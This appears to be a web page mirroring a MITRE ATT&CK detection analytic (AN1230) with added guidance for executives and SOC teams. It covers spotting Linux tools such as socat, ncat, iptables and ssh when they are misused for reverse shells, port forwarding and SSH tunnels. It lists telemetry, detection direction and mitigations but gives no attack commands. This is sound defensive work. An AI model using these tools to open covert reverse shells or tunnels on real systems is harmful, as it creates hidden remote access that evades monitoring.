AN1230: Analytic 1230
User-space tools (e.g., `socat`, `ncat`, `iptables`, `ssh`) used in non-standard ways to establish reverse shells, port-forwarding, or inter-host connections. Often chained with uncommon outbound destinations or SSH tunnels.
Analyst context for executives and security teams
This analytic is about spotting Linux user-space tools such as socat, ncat, iptables, and ssh when they are used in unusual ways to create reverse shells, port forwarding, SSH tunnels, or unexpected host-to-host connections. For leaders, the value is not the tool names themselves—many are legitimate—but whether the organization can distinguish approved administration from covert connectivity that may bypass normal access paths and monitoring.
Executive priority
Prioritize this as a visibility and control-validation issue for Linux environments. It can affect incident response speed and business continuity because unauthorized tunnels or reverse connections may hide remote access paths, complicate containment, and weaken evidence for audits or investigations. Executives should ask whether Linux egress, administrative tooling, and SSH tunnel usage are governed, logged, and reviewable—not just whether the tools are installed.
Technical view
SOC and detection teams should validate Linux telemetry for command execution and network connection evidence involving user-space networking tools used in non-standard ways. Because ATT&CK provides no official detection logic or tactic mapping for this analytic, local baselining is essential: identify expected use of socat, ncat, iptables, ssh, port forwarding, and outbound SSH tunneling, then alert on deviations such as uncommon outbound destinations, unusual parent processes, unexpected inter-host paths, or tunnel-like activity from systems that do not normally perform administration or relay functions.
Likely telemetry
- Linux process creation and command-line arguments
- Parent/child process relationships for networking and shell-related utilities
- Outbound network connection logs from Linux hosts
- SSH session and tunnel-related logs where available
- Firewall, host firewall, or iptables configuration/change logs
Detection direction
- Build detections around behavior and context rather than tool presence alone, since socat, ncat, iptables, and ssh can be legitimate administrative tools.
- Baseline approved Linux administrative workflows, expected destinations, and systems authorized to create tunnels or port-forwarding connections.
- Tune for uncommon outbound destinations, unexpected inter-host connections, and SSH tunnel-like behavior, especially from servers or users without an administrative reason.
- Correlate process execution with network telemetry; command-line evidence alone may miss activity, while network-only evidence may lack intent.
- Review false positives from troubleshooting, DevOps, maintenance, and sanctioned remote access activity.
Mitigation priorities
- Define and document approved use cases for Linux networking tools and SSH tunneling.
- Restrict or monitor outbound connectivity from Linux systems according to asset role and business need.
- Limit administrative access and privileges needed to create tunnels, modify iptables, or run non-standard networking utilities.
- Ensure Linux endpoint, SSH, and network telemetry are retained long enough to support investigation.
- Use detection testing or purple-team validation to confirm that non-standard tool usage produces observable evidence in the SOC workflow.
Analyst notes and limits
This object is a detection analytic for Linux and describes user-space tools used in non-standard ways for reverse shells, port forwarding, or inter-host connections. There are no supplied relationships, tactic mappings, aliases, labels, or official detection logic, so the practical guidance should be treated as validation direction rather than a complete analytic specification.
The supplied ATT&CK fields do not provide detection pseudocode, data components, tactics, related techniques, threat actors, campaigns, or mitigations. Environment-specific baselines, approved administration patterns, and available Linux/network telemetry are required before determining coverage or priority.
Analytic 1230
User-space tools (e.g., `socat`, `ncat`, `iptables`, `ssh`) used in non-standard ways to establish reverse shells, port-forwarding, or inter-host connections. Often chained with uncommon outbound destinations or SSH tunnels.
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
All related ATT&CK context
No relationships are available in the current normalized data for this object.
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates .
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | 1.0 | Current bundle | 7b58a348c909… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
-
[1]
mitre-attack AN1230Open source URL
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.